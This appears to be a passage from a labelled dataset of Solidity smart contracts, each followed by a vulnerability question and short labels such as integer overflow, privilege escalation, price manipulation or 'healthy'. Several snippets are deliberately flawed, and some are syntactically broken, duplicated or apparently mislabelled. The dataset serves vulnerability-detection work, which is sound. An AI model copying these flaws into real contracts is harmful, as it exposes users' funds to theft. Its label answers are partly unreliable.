75   function increaseApproval(address _spender, uint _addedValue) public returns (bool) {
76     allowed[msg.sender][_spender] = allowed[msg.sender][_spender].add(_addedValue);
77     emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
78     return true;
79   }

 
80   function decreaseApproval(address _spender, uint _subtractedValue) public returns (bool) {
81     uint oldValue = allowed[msg.sender][_spender];
82     if (_subtractedValue > oldValue) {
83       allowed[msg.sender][_spender] = 0;
84     } else {
85       allowed[msg.sender][_spender] = oldValue.sub(_subtractedValue);
86     }
87     emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
88     return true;
89   }

90 }
91 contract EZDEX is StandardToken {
    
92     string public constant name = "EZDEX";
93     string public constant symbol = "EZX";
94     uint8 public constant decimals = 18;
    
95     uint256 public constant INITIAL_SUPPLY = 1000000000000000000000000000;
    
96     function EZDEX() {
97         totalSupply_ = INITIAL_SUPPLY;
98         balances[msg.sender] = INITIAL_SUPPLY;
99     }
    
100 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity ^0.4.25;

2 library SafeMath {
3   function mul(uint256 a, uint256 b) internal pure returns (uint256) {
4     uint256 c = a * b;
5     return c;
6   }

7   function div(uint256 a, uint256 b) internal pure returns (uint256) {
    
8     uint256 c = a / b;
9     return c;
10   }

11   function sub(uint256 a, uint256 b) internal pure returns (uint256) {
12     return a - b;
13   }

14   function add(uint256 a, uint256 b) internal pure returns (uint256) {
15     uint256 c = a + b;

16     return c;
17   }

18   function toUINT112(uint256 a) internal pure returns(uint112) {
19     assert(uint112(a) == a);
20     return uint112(a);
21   }

22   function toUINT120(uint256 a) internal pure returns(uint120) {
23     assert(uint120(a) == a);
24     return uint120(a);
25   }

26   function toUINT128(uint256 a) internal pure returns(uint128) {
27     assert(uint128(a) == a);
28     return uint128(a);
29   }
30 }

31 contract ERC20Basic {
32   uint256 public totalSupply;
33   function balanceOf(address who) public constant returns (uint256);
34   function transfer(address to, uint256 value) public returns (bool);
35   event Transfer(address indexed from, address indexed to, uint256 value);
36 }

37 contract ERC20 is ERC20Basic {
38   function allowance(address owner, address spender) public constant returns (uint256);
39   function transferFrom(address from, address to, uint256 value) public returns (bool);
40   function approve(address spender, uint256 value) public returns (bool);
41   event Approval(address indexed owner, address indexed spender, uint256 value);
42 }

43 contract BasicToken is ERC20Basic {
44   using SafeMath for uint256;

45   mapping(address => uint256) balances;


46   function transfer(address _to, uint256 _value) public returns (bool) {
47     require(_to != address(0));
48     require(_value <= balances[msg.sender]);


49     balances[msg.sender] = balances[msg.sender].sub(_value);
50     balances[_to] = balances[_to].add(_value);
51     emit Transfer(msg.sender, _to, _value);
52     return true;
53   }

54   /**
55   * @dev Gets the balance of the specified address.
56   * @param _owner The address to query the the balance of.
57   * @return An uint256 representing the amount owned by the passed address.
58   */
59   function balanceOf(address _owner) public constant returns (uint256 balance) {
60     return balances[_owner];
61   }

62 }

63 contract StandardToken is ERC20, BasicToken {

64   mapping (address => mapping (address => uint256)) internal allowed;


65   /**
66    * @dev Transfer tokens from one address to another
67    * @param _from address The address which you want to send tokens from
68    * @param _to address The address which you want to transfer to
69    * @param _value uint256 the amount of tokens to be transferred
70    */
71   function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
72     require(_to != address(0));
73     require(_value <= balances[_from]);
74     require(_value <= allowed[_from][msg.sender]);

75     balances[_from] = balances[_from].sub(_value);
76     balances[_to] = balances[_to].add(_value);
77     allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
78     emit Transfer(_from, _to, _value);
79     return true;
80   }

 
81   function approve(address _spender, uint256 _value) public returns (bool) {
82     require((_value == 0) || (allowed[msg.sender][_spender] == 0));
83     allowed[msg.sender][_spender] = _value;
84     emit Approval(msg.sender, _spender, _value);
85     return true;
86   }

 
87   function allowance(address _owner, address _spender) public constant returns (uint256 remaining) {
88     return allowed[_owner][_spender];
89   }

90 }

91 contract SOLVECARE is StandardToken {

92   string public constant name = "t.me/solvecareofficial";
93   string public constant symbol = "SOLVE";
94   uint8 public constant decimals = 18;


95   uint256 public constant INITIAL_SUPPLY = 1000000000 * (10 ** uint256(decimals));
  
96   constructor() public {
97     totalSupply = INITIAL_SUPPLY;
98     balances[msg.sender] = INITIAL_SUPPLY;
99     emit Transfer(msg.sender, msg.sender, INITIAL_SUPPLY);
100   }

101 }
What are the vulnerabilities in the contract?
arithmetic flaw
integer over/underflow
<end of text>
1 // SPDX-License-Identifier: MIT OR Apache-2.0
2 pragma solidity >=0.6.11;

3  */
4 contract Replica {
 
5     /**
6      * @notice Emitted when message is processed
7      * @param messageHash Hash of message that failed to process
8      * @param success TRUE if the call was executed successfully, FALSE if the call reverted
9      * @param returnData the return data from the external call
10      */
11     event Process(
12         bytes32 indexed messageHash,
13         bool indexed success,
14         bytes indexed returnData
15     );

   

16     function initialize(
17         uint32 _remoteDomain,
18         address _updater,
19         bytes32 _committedRoot,
20         uint256 _optimisticSeconds
21     ) public initializer {
22         __NomadBase_initialize(_updater);
23         // set storage variables
24         entered = 1;
25         remoteDomain = _remoteDomain;
26         committedRoot = _committedRoot;     
27         confirmAt[_committedRoot] = 1;
28         optimisticSeconds = _optimisticSeconds;
29         emit SetOptimisticTimeout(_optimisticSeconds);
30     }
31}
What are the vulnerabilities in the contract?
cross bridge
ID Uniqueness violation
<end of text>
1 contract Vote {
2    struct Proposal {
3       uint160 sTime; address newOwner;
4  }
5   IERC20 votingToken;
6   IERC20 LockedToken;
7   address owner;
8   Proposal proposal;

9  function propose() external {
10       require(proposal.sTime == 0, "on-going proposal");
11       proposal = Proposal(block.timestamp, msg.sender);
12    }
13  function vote(uint amount) external {
14     require(proposal.sTime + 2 days > block.timestamp,
15      "voting has ended");
16     votingToken.transferFrom(
17     msg.sender, address(this), amount);
18  }
19  function end() external {
20     require(proposal.sTime != 0, "no proposal");
21     require(proposal.sTime + 2 days < block.timestamp,
22    "voting has not ended");
23    require(votingToken.balanceOf(address(this))*2 >
24    votingToken.totalSupply(), "vote failed");
25    owner = proposal.newOwner;
26    delete proposal;
27  }

28 function getLockedFunds() external onlyOwner {
29      return LockedToken;

30    }
31 }
What are the vulnerabilities in the contract?
privilege escalation
integer overlow/underflow
<end of text>
1  contract Lottery {
2  // user address -> lottery id -> count
3  mapping (address => mapping(uint64 => uint))
4  public tickets;
5  uint64 winningId; // the winning id
6  bool drawingPhase; // whether the owner is drawing

7  // invoked every day to reset a round
8  function reset() external onlyOwner {
9  delete tickets;
10  winningId = 0; drawingPhase = false;
11  }
12  function buy(uint64 id, uint amount) external {
13  require(winningId == 0, "already drawn");
14  require(!drawingPhase, "drawing")
15  receivePayment(msg.sender, amount),
16  tickets[msg.sender][id] += amount;
17  }
18  function enterDrawingPhase() external onlyOwner {
19  drawingPhase = true;
20  }
21  // id is randomly chosen off-chain, i.e., by chainlink
22  function draw(uint64 id) external onlyOwner {
23  require(winningId == 0, "already drawn");
24  require(drawingPhase, "not drawing");
25  require(id != 0, "invalid winning number");
26  winningId = id;
27  }
28  // claim reward for winners
29 function claimReward() external {
30  require(winningId != 0, "not drawn");

31  }
32  function multiBuy(uint64[] ids, uint[] amounts)
33  external {
34  require(winningId == 0, "already drawn");
35   uint totalAmount = 0;
36  for (int i = 0; i < ids.length; i++) {
37   tickets[msg.sender][ids[i]] += amounts[i];
38   totalAmount += amounts[i];
39  }
40  receivePayment(msg.sender, totalAmount),
41  }
42 }
What are the vulnerabilities in the contract?
atomicity violation
business logic flaw
<end of text>
1 // SPDX-License-Identifier: AGPL-3.0-or-later

2 pragma solidity 0.8.9;

3 import "./BaseVault.sol";
4 ct STETHVault is BaseVault {
5     using SafeERC20 for IERC20Metadata;
6     using AuxMath for uint256;
7     using AuxMath for AuxMath.Fractional;
8     using DepositQueueLib for DepositQueueLib.DepositQueue;

9     uint8 public immutable sharePriceDecimals;
10     uint256 public lastRoundAssets;
11     AuxMath.Fractional public lastSharePrice;

12     /*
13      @dev investorRatio is the proportion that the weekly yield will be splitted
14      The precision of this number is set by the variable DENOMINATOR. 5000 is equivalent to 50%
15     */
16     uint256 public constant investorRatio = 5000;
17     address public immutable investor;

18     event StartRoundData(uint256 indexed roundId, uint256 lastRoundAssets, uint256 sharePrice);
19     event EndRoundData(
20         uint256 indexed roundId,
21         uint256 roundAccruedInterest,
22         uint256 investmentYield,
23         uint256 idleAssets
24     );
25     event SharePrice(uint256 indexed roundId, uint256 startSharePrice, uint256 endSharePrice);

26     constructor(
27         IConfigurationManager _configuration,
28         IERC20Metadata _asset,
29         address _investor
30     ) BaseVault(_configuration, _asset) {
31         investor = _investor;
32         sharePriceDecimals = _asset.decimals();
33     }

34     function name() public view override returns (string memory) {
35         return string(abi.encodePacked(_asset.symbol(), " Volatility Vault"));
36     }

37     function symbol() public view override returns (string memory) {
38         return string(abi.encodePacked(_asset.symbol(), "vv"));
39     }

40     function _afterRoundStart(uint256) internal override {
41         uint256 supply = totalSupply();

42         lastRoundAssets = totalAssets();
43         lastSharePrice = AuxMath.Fractional({ numerator: supply == 0 ? 0 : lastRoundAssets, denominator: supply });

44         uint256 sharePrice = lastSharePrice.denominator == 0 ? 0 : lastSharePrice.mulDivDown(10**sharePriceDecimals);
45         emit StartRoundData(currentRoundId, lastRoundAssets, sharePrice);
46     }

47     function _afterRoundEnd() internal override {
48         uint256 roundAccruedInterest = 0;
49         uint256 endSharePrice = 0;
50         uint256 investmentYield = _asset.balanceOf(investor);
51         uint256 supply = totalSupply();

52         if (supply != 0) {
53             roundAccruedInterest = totalAssets() - lastRoundAssets;
54             uint256 investmentAmount = (roundAccruedInterest * investorRatio) / DENOMINATOR;

55             // Pulls the yields from investor
56             if (investmentYield > 0) {
57                 _asset.safeTransferFrom(investor, address(this), investmentYield);
58             }

59             if (investmentAmount > 0) {
60                 _asset.safeTransfer(investor, investmentAmount);
61             }

62             // End Share price needs to be calculated after the transfers between investor and vault
63             endSharePrice = (totalAssets()).mulDivDown(10**sharePriceDecimals, supply);
64         }
65         uint256 startSharePrice = lastSharePrice.denominator == 0
66             ? 0
67             : lastSharePrice.mulDivDown(10**sharePriceDecimals);

68         emit EndRoundData(currentRoundId, roundAccruedInterest, investmentYield, totalIdleAssets());
69         emit SharePrice(currentRoundId, startSharePrice, endSharePrice);
70     }

71     function _beforeWithdraw(uint256 shares, uint256) internal override {
72         lastRoundAssets -= shares.mulDivDown(lastSharePrice);
73     }


74     function totalAssets() public view override returns (uint256) {
75         return _asset.balanceOf(address(this)) - totalIdleAssets();
76     }


77     function _deposit(
78         uint256 assets,
79         uint256 shares,
80         address receiver
81     ) internal override returns (uint256 depositedAssets) {
82         _spendCap(shares);

83         assets = _stETHTransferFrom(msg.sender, address(this), assets);
84         depositQueue.push(DepositQueueLib.DepositEntry(receiver, assets));

85         emit Deposit(msg.sender, receiver, assets, shares);

86         return assets;
87     }

88     function _withdraw(
89         uint256 assets,
90         uint256 shares,
91         address receiver,
92         address owner
93     ) internal virtual override returns (uint256 receiverAssets, uint256 receiverShares) {
94         if (msg.sender != owner) {
95             _spendAllowance(owner, msg.sender, shares);
96         }

97         _burn(owner, shares);
98         _restoreCap(shares);

99         // Apply custom withdraw logic
100         _beforeWithdraw(shares, assets);

101         uint256 fee = _getFee(assets);
102         receiverAssets = assets - fee;
103         receiverShares = shares;

104         emit Withdraw(msg.sender, receiver, owner, receiverAssets, shares);

105         _asset.safeTransfer(receiver, receiverAssets);

106         if (fee > 0) {
107             emit FeeCollected(fee);
108             _asset.safeTransfer(controller(), fee);
109         }
110     }

111     function _stETHTransferFrom(
112         address from,
113         address to,
114         uint256 amount
115     ) internal returns (uint256 effectiveAmount) {
116         uint256 balanceBefore = _asset.balanceOf(to);
117         if (from == address(this)) {
118             _asset.safeTransfer(to, amount);
119         } else {
120             _asset.safeTransferFrom(from, to, amount);
121         }
122         return _asset.balanceOf(to) - balanceBefore;
123     }
124 }
What are the vulnerabilities in the contract?
vault
asset swapping
<end of text>
1 abstract contract BaseVault is IVault, ERC20Permit, Capped {

2      function processQueuedDeposits(uint256 startIndex, uint256 endIndex) external {
3          if (!isProcessingDeposits) revert IVault__NotProcessingDeposits();

4          uint256 _totalAssets = totalAssets();
5          for (uint256 i = startIndex; i < endIndex; i++) {
6              uint256 currentAssets = _totalAssets + processedDeposits;
7              DepositQueueLib.DepositEntry memory depositEntry = depositQueue.get(i);
8              _processDeposit(depositEntry, currentAssets);
9              processedDeposits += depositEntry.amount;
10          }
11          depositQueue.remove(startIndex, endIndex);
12      }


13      function _processDeposit(DepositQueueLib.DepositEntry memory depositEntry, uint256 currentAssets) internal virtual {
14          uint256 supply = totalSupply();
15          uint256 assets = depositEntry.amount;
16         uint256 shares = currentAssets == 0 || supply == 0 ? assets : assets.mulDivUp(supply, currentAssets);
17          _mint(depositEntry.owner, shares);
18          emit DepositProcessed(depositEntry.owner, currentRoundId, assets, shares);
19      }

20      function _getFee(uint256 assets) internal view returns (uint256) {
21         return assets.mulDivDown(withdrawFeeRatio(), DENOMINATOR);
22      }

23      function _deposit(
24          uint256 assets,
25          uint256 shares,
26          address receiver
27      ) internal virtual returns (uint256 depositedAssets) {
28          _spendCap(shares);

29         depositQueue.push(DepositQueueLib.DepositEntry(receiver, assets));

30          emit Deposit(msg.sender, receiver, assets, shares);
31          _asset.safeTransferFrom(msg.sender, address(this), assets);

32          return assets;
33      }


34      function _withdraw(
35          uint256 assets,
36          uint256 shares,
37          address receiver,
38          address owner
39      ) internal virtual returns (uint256 receiverAssets, uint256 receiverShares) {
40          if (msg.sender != owner) {
41              _spendAllowance(owner, msg.sender, shares);
42         }

43          _burn(owner, shares);
44          _restoreCap(shares);
45          _beforeWithdraw(shares, assets);

46          uint256 fee = _getFee(assets);
47          receiverAssets = assets - fee;
48          receiverShares = shares;

49          emit Withdraw(msg.sender, receiver, owner, receiverAssets, shares);
50         _asset.safeTransfer(receiver, receiverAssets);

51          if (fee > 0) {
52              emit FeeCollected(fee);
53             _asset.safeTransfer(controller(), fee);
54          }
55     }




56     function _beforeWithdraw(uint256 shares, uint256 assets) internal virtual {}

 
57      function _afterRoundStart(uint256 assets) internal virtual {}

58     // solhint-disable-next-line no-empty-blocks
59      /* This hook should be implemented in the contract implementation.
60         It will trigger after setting isProcessingDeposits to true
61      */
62     function _afterRoundEnd() internal virtual {}
63 }
What are the vulnerabilities in the contract?
insufficient gas
<end of text>
1/ / SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3  
4  contract overflow{
5         function pay(address[] recipients,
6                         uint256[] amounts) {
7         require(recipients.length==amounts.length);
8         for (uint i = 0; i < recipients.length; i++) {
9         recipients[i].send(amounts[i]);
10         }
11         }
12  }
What are the vulnerabilities in the contract?
integer overflow/underflow
insufficient gas
<end of text>
1 / / SPDX-License-Identifier: MIT
2   pragma solidity >=0.4.24 <0.6.0;
3 contract AccountingError{

4 function swap(uint amount1Out, address to) external {
5      token1.transfer(to, amount1Out);
6      IUniswapV2Callee(to).uniswapV2Call();

7      uint balance0 = token0.balanceOf(address(this));
8      uint balance1 = token1.balanceOf(address(this));
9      uint amount0In = balance0 - (reserve0 - amount0Out);
10      uint balance0Adj = balance0 * 10000 - amount0In * 22;
11      require(
12            balance0Adj*balance1 >= reserve0* reserve1* 1000,
13            "insufficient funds transferred back");
14     reserve0 = balance0; reserve1 = balance1;
15  }
16 }
What are the vulnerabilities in the contract?
arithmetic flaw

<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.5.0;
 
3   contract Swap {
4           IERC20 public WEI;
5           IERC20 public USD;
6           IUniswapV2Pair public pair; 
7           mapping(address => uint) public debt;
8           mapping(address => uint) public collateral;
 
9           function liquidate(address user) public {
10               uint dAmount = debt[user];
11               uint cAmount = collateral[user];
12              require(getPrice() * cAmount * 80 / 100 < dAmount,
13               "the given user’s fund cannot be liquidated");
14              address _this = address(this);
15             USD.transferFrom(msg.sender, _this, dAmount);
16              WEI.transferFrom(_this, msg.sender, cAmount);
17         }
18           function  getPrice() public payable returns (uint) { 
 
19                price = USD.balanceOf(address(pair)) / WEI.balanceOf(address(pair))
20                  return price;
21       }
22    }
What are the vulnerabilities in the contract?
price manipulation
inconsistent state update
<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.5.0;
 
3 contract etherleakge{
4    function payout(address[] recipients,
5                 uint256[] amounts) {
6       require(recipients.length==amounts.length);
7       for (uint i = 0; i < recipients.length; i++) {

8          recipients[i].send(amounts[i]);
9          }
10    }
11 }
What are the vulnerabilities in the contract?
ether leakage
<end of text>
1 pragma solidity ^0.4.11;
2 
3 contract Vote {
4         struct Proposal {
5         uint160 sTime; address newOwner;
6         }
7         IERC20 votingToken;
8         address owner;
9         Proposal proposal;
10 
11         function startExecute() external {
12             require(proposal.sTime == 0, ""on-going proposal"");
13             proposal = Proposal(block.timestamp, msg.sender);
14         }
15         function execute(uint amount) external {
16             require(proposal.sTime + 2 days > block.timestamp,
17             ""voting has ended"");
18             votingToken.transferFrom(
19             msg.sender, address(this), amount);
20         }
21         function endExecute() external {
22             require(proposal.sTime != 0, ""no proposal"");
23             require(proposal.sTime + 2 days < block.timestamp,
24             ""voting has not ended"");
25             require(votingToken.balanceOf(address(this))*2 >
26             votingToken.totalSupply(), ""vote failed"");
27             owner = proposal.newOwner;
28             delete proposal;
29         }
30 }
What are the vulnerabilities in the contract?
privilege escalation
integer overlow/underflow
<end of text>
1 pragma solidity ^0.4.11;
2 
3 contract Vote {
4         struct Proposal {
5         uint160 sTime; address newOwner;
6         }
7         IERC20 votingToken;
8         address owner;
9         Proposal proposal;
10 
11         function startExecute() external {
12             require(proposal.sTime == 0, ""on-going proposal"");
13             proposal = Proposal(block.timestamp, msg.sender);
14         }
15         function execute(uint amount) external {
16             require(proposal.sTime + 2 days > block.timestamp,
17             ""voting has ended"");
18             votingToken.transferFrom(
19             msg.sender, address(this), amount);
20         }
21         function endExecute() external {
22             require(proposal.sTime != 0, ""no proposal"");
23             require(proposal.sTime + 2 days < block.timestamp,
24             ""voting has not ended"");
25             require(votingToken.balanceOf(address(this))*2 >
26             votingToken.totalSupply(), ""vote failed"");
27             owner = proposal.newOwner;
28             delete proposal;
29         }
30 }
What are the vulnerabilities in the contract?
privilege escalation
integer overlow/underflow
<end of text>
1 pragma solidity ^0.4.11;
2 
3 contract Vote {
4         struct Proposal {
5         uint160 sTime; address newOwner;
6         }
7         IERC20 votingToken;
8         address owner;
9         Proposal proposal;
10 
11         function startExecute() external {
12             require(proposal.sTime == 0, ""on-going proposal"");
13             proposal = Proposal(block.timestamp, msg.sender);
14         }
15         function execute(uint amount) external {
16             require(proposal.sTime + 2 days > block.timestamp,
17             ""voting has ended"");
18             votingToken.transferFrom(
19             msg.sender, address(this), amount);
20         }
21         function endExecute() external {
22             require(proposal.sTime != 0, ""no proposal"");
23             require(proposal.sTime + 2 days < block.timestamp,
24             ""voting has not ended"");
25             require(votingToken.balanceOf(address(this))*2 >
26             votingToken.totalSupply(), ""vote failed"");
27             owner = proposal.newOwner;
28             delete proposal;
29         }
30 }
What are the vulnerabilities in the contract?
privilege escalation
integer overlow/underflow
<end of text>
//votingToken is important for tracking 
1 pragma solidity ^0.4.11;
2 
3 contract Vote {
4         struct Proposal {
5         uint160 sTime; address newOwner;
6         }
7         IERC20 votingToken;
8         address owner;
9         Proposal proposal;
10 
11         function startExecute() external {
12             require(proposal.sTime == 0, ""on-going proposal"");
13             proposal = Proposal(block.timestamp, msg.sender);
14         }
15         function execute(uint amount) external {
16             require(proposal.sTime + 2 days > block.timestamp,
17             ""voting has ended"");
18             votingToken.transferFrom(
19             msg.sender, address(this), amount);
20         }
21         function endExecute() external {
22             require(proposal.sTime != 0, ""no proposal"");
23             require(proposal.sTime + 2 days < block.timestamp,
24             ""voting has not ended"");
25             require(votingToken.balanceOf(address(this))*2 >
26             votingToken.totalSupply(), ""vote failed"");
27             owner = proposal.newOwner;
28             delete proposal;
29         }
30 }


What are the vulnerabilities in the contract?
privilege escalation
integer overlow/underflow
<end of text>
1  // SPDX-License-Identifier: MIT
2 // OpenZeppelin Contracts (last updated v4.7.0) (proxy/transparent/TransparentUpgradeableProxy.sol)

3 pragma solidity ^0.8.0;

4 import "../ERC1967/ERC1967Proxy.sol";

5 interface ITransparentUpgradeableProxy {
6     event Upgraded(address indexed implementation);
7     event AdminChanged(address previousAdmin, address newAdmin);
8     function admin() external view returns (address);
9     function implementation() external view returns (address);
10     function changeAdmin(address) external;
11     function upgradeTo(address) external;
12     function upgradeToAndCall(address, bytes memory) payable external;
13 }

14 /**
15  * @dev This contract implements a proxy that is upgradeable by an admin.
16  *
17  * To avoid https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357[proxy selector
18  * clashing], which can potentially be used in an attack, this contract uses the
19  * https://blog.openzeppelin.com/the-transparent-proxy-pattern/[transparent proxy pattern]. This pattern implies two
20  * things that go hand in hand:
21  *
22  * 1. If any account other than the admin calls the proxy, the call will be forwarded to the implementation, even if
23  * that call matches one of the admin functions exposed by the proxy itself.
24  * 2. If the admin calls the proxy, it can access the admin functions, but its calls will never be forwarded to the
25  * implementation. If the admin tries to call a function on the implementation it will fail with an error that says
26  * "admin cannot fallback to proxy target".
27  *
28  * These properties mean that the admin account can only be used for admin actions like upgrading the proxy or changing
29  * the admin, so it's best if it's a dedicated account that is not used for anything else. This will avoid headaches due
30  * to sudden errors when trying to call a function from the proxy implementation.
31  *
32  * Our recommendation is for the dedicated account to be an instance of the {ProxyAdmin} contract. If set up this way,
33  * you should think of the `ProxyAdmin` instance as the real administrative interface of your proxy.
34  */
35 contract Proxy is ERC1967Proxy {
36     /**
37      * @dev Initializes an upgradeable proxy managed by `_admin`, backed by the implementation at `_logic`, and
38      * optionally initialized with `_data` as explained in {ERC1967Proxy-constructor}.
39      */
40     constructor(address _logic, address admin_, bytes memory _data) payable ERC1967Proxy(_logic, _data) {
41         _changeAdmin(admin_);
42     }

43     /**
44      * @dev If caller is the admin process the call internally, otherwise transparently fallback to the proxy behavior
45      */
46     function _fallback() internal virtual override {
47         if (msg.sender == _getAdmin()) {
48             bytes memory ret;
49             bytes4 selector = msg.sig;
50             if (selector == ITransparentUpgradeableProxy.upgradeTo.selector) {
51                 ret = _dispatchUpgradeTo();
52             } else if (selector == ITransparentUpgradeableProxy.upgradeToAndCall.selector) {
53                 ret = _dispatchUpgradeToAndCall();
54             } else if (selector == ITransparentUpgradeableProxy.changeAdmin.selector) {
55                 ret = _dispatchChangeAdmin();
56             } else if (selector == ITransparentUpgradeableProxy.admin.selector) {
57                 ret = _dispatchAdmin();
58             } else if (selector == ITransparentUpgradeableProxy.implementation.selector) {
59                 ret = _dispatchImplementation();
60             } else {
61                 revert('TransparentUpgradeableProxy: admin cannot fallback to proxy target');
62             }
63             assembly {
64                 return(add(ret, 0x20), mload(ret))
65             }
66         } else {
67             super._fallback();
68         }
69     }

70     /**
71      * @dev Returns the current admin.
72      *
73      * TIP: To get this value clients can read directly from the storage slot shown below (specified by EIP1967) using the
74      * https://eth.wiki/json-rpc/API#eth_getstorageat[`eth_getStorageAt`] RPC call.
75      * `0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103`
76      */
77     function _dispatchAdmin() private returns (bytes memory) {
78         _requireZeroValue();

79         address admin = _getAdmin();
80         return abi.encode(admin);
81     }

82     /**
83      * @dev Returns the current implementation.
84      *
85      * TIP: To get this value clients can read directly from the storage slot shown below (specified by EIP1967) using the
86      * https://eth.wiki/json-rpc/API#eth_getstorageat[`eth_getStorageAt`] RPC call.
87      * `0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc`
88      */
89     function _dispatchImplementation() private returns (bytes memory) {
90         _requireZeroValue();

91         address implementation = _implementation();
92         return abi.encode(implementation);
93     }

94     /**
95      * @dev Changes the admin of the proxy.
96      */
97     function _dispatchChangeAdmin() private returns (bytes memory) {
98         _requireZeroValue();

99         address newAdmin = abi.decode(msg.data[4:], (address));
100         _changeAdmin(newAdmin);

101         return "";
102     }

103     /**
104      * @dev Upgrade the implementation of the proxy.
105      */
106     function _dispatchUpgradeTo() private returns (bytes memory) {
107         _requireZeroValue();

108         address newImplementation = abi.decode(msg.data[4:], (address));
109         _upgradeToAndCall(newImplementation, bytes(""), false);

110         return "";
111     }

112     /**
113      * @dev Upgrade the implementation of the proxy, and then call a function from the new implementation as specified
114      * by `data`, which should be an encoded function call. This is useful to initialize new storage variables in the
115      * proxied contract.
116      */
117     function _dispatchUpgradeToAndCall() private returns (bytes memory) {
118         (address newImplementation, bytes memory data) = abi.decode(msg.data[4:], (address, bytes));
119         _upgradeToAndCall(newImplementation, data, true);

120         return "";
121     }

122     /**
123      * @dev Returns the current admin.
124      */
125     function _admin() internal view virtual returns (address) {
126         return _getAdmin();
127     }

128     /**
129      * @dev To keep this contract fully transparent, all `ifAdmin` functions must be payable. This helper is here to
130      * emulate some proxy functions being non-payable while still allowing value to pass through.
131      */
132     function _requireZeroValue() private {
133         require(msg.value == 0);
134     }
135 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
inconsistent state update
atomicity violation
<end of text>
1 // SPDX-License-Identifier: MIT
2 // OpenZeppelin Contracts (last updated v4.8.0) (governance/compatibility/GovernorCompatibilityBravo.sol)

3 pragma solidity ^0.8.0;

4 import "../../utils/math/SafeCast.sol";
5 import "../extensions/IGovernorTimelock.sol";
6 import "../Governor.sol";
7 import "./IGovernorCompatibilityBravo.sol";

8 /**
9  * @dev Compatibility layer that implements GovernorBravo compatibility on top of {Governor}.
10  *
11  * This compatibility layer includes a voting system and requires a {IGovernorTimelock} compatible module to be added
12  * through inheritance. It does not include token bindings, nor does it include any variable upgrade patterns.
13  *
14  * NOTE: When using this module, you may need to enable the Solidity optimizer to avoid hitting the contract size limit.
15  *
16  * _Available since v4.3._
17  */
//check for possible array OOM
18 abstract contract GovernorCompatibilityBravo is IGovernorTimelock, IGovernorCompatibilityBravo, Governor {
19     enum VoteType {
20         Against,
21         For,
22         Abstain
23     }

24     struct ProposalDetails {
25         address proposer;
26         address[] targets;
27         uint256[] values;
28         string[] signatures;
29         bytes[] calldatas;
30         uint256 forVotes;
31         uint256 againstVotes;
32         uint256 abstainVotes;
33         mapping(address => Receipt) receipts;
34         bytes32 descriptionHash;
35     }

36     mapping(uint256 => ProposalDetails) private _proposalDetails;

37     // solhint-disable-next-line func-name-mixedcase
38     function COUNTING_MODE() public pure virtual override returns (string memory) {
39         return "support=bravo&quorum=bravo";
40     }

41     // ============================================== Proposal lifecycle ==============================================
42     /**
43      * @dev See {IGovernor-propose}.
44      */
45     function propose(
46         address[] memory targets,
47         uint256[] memory values,
48         bytes[] memory calldatas,
49         string memory description
50     ) public virtual override(IGovernor, Governor) returns (uint256) {
51         _storeProposal(_msgSender(), targets, values, new string[](calldatas.length), calldatas, description);
52         return super.propose(targets, values, calldatas, description);
53     }

54     /**
55      * @dev See {IGovernorCompatibilityBravo-propose}.
56      */
57     function propose(
58         address[] memory targets,
59         uint256[] memory values,
60         string[] memory signatures,
61         bytes[] memory calldatas,
62         string memory description
63     ) public virtual override returns (uint256) {
64         _storeProposal(_msgSender(), targets, values, signatures, calldatas, description);
65         return propose(targets, values, _encodeCalldata(signatures, calldatas), description);
66     }

67     /**
68      * @dev See {IGovernorCompatibilityBravo-queue}.
69      */
70     function queue(uint256 proposalId) public virtual override {
71         ProposalDetails storage details = _proposalDetails[proposalId];
72         queue(
73             details.targets,
74             details.values,
75             _encodeCalldata(details.signatures, details.calldatas),
76             details.descriptionHash
77         );
78     }

79     /**
80      * @dev See {IGovernorCompatibilityBravo-execute}.
81      */
82     function execute(uint256 proposalId) public payable virtual override {
83         ProposalDetails storage details = _proposalDetails[proposalId];
84         execute(
85             details.targets,
86             details.values,
87             _encodeCalldata(details.signatures, details.calldatas),
88             details.descriptionHash
89         );
90     }

91     function cancel(uint256 proposalId) public virtual override {
92         ProposalDetails storage details = _proposalDetails[proposalId];

93         require(
94             _msgSender() == details.proposer || getVotes(details.proposer, block.number - 1) < proposalThreshold(),
95             "GovernorBravo: proposer above threshold"
96         );

97         _cancel(
98             details.targets,
99             details.values,
100             _encodeCalldata(details.signatures, details.calldatas),
101             details.descriptionHash
102         );
103     }

104     /**
105      * @dev Encodes calldatas with optional function signature.
106      */
107     function _encodeCalldata(string[] memory signatures, bytes[] memory calldatas)
108         private
109         pure
110         returns (bytes[] memory)
111     {
112         bytes[] memory fullcalldatas = new bytes[](calldatas.length);

113         for (uint256 i = 0; i < signatures.length; ++i) {
114             fullcalldatas[i] = bytes(signatures[i]).length == 0
115                 ? calldatas[i]
116                 : abi.encodePacked(bytes4(keccak256(bytes(signatures[i]))), calldatas[i]);
117         }

118         return fullcalldatas;
119     }

120     /**
121      * @dev Store proposal metadata for later lookup
122      */
123     function _storeProposal(
124         address proposer,
125         address[] memory targets,
126         uint256[] memory values,
127         string[] memory signatures,
128         bytes[] memory calldatas,
129         string memory description
130     ) private {
131         bytes32 descriptionHash = keccak256(bytes(description));
132         uint256 proposalId = hashProposal(targets, values, _encodeCalldata(signatures, calldatas), descriptionHash);

133         ProposalDetails storage details = _proposalDetails[proposalId];
134         if (details.descriptionHash == bytes32(0)) {
135             details.proposer = proposer;
136             details.targets = targets;
137             details.values = values;
138             details.signatures = signatures;
139             details.calldatas = calldatas;
140             details.descriptionHash = descriptionHash;
141         }
142     }

143     // ==================================================== Views =====================================================
144     /**
145      * @dev See {IGovernorCompatibilityBravo-proposals}.
146      */
147     function proposals(uint256 proposalId)
148         public
149         view
150         virtual
151         override
152         returns (
153             uint256 id,
154             address proposer,
155             uint256 eta,
156             uint256 startBlock,
157             uint256 endBlock,
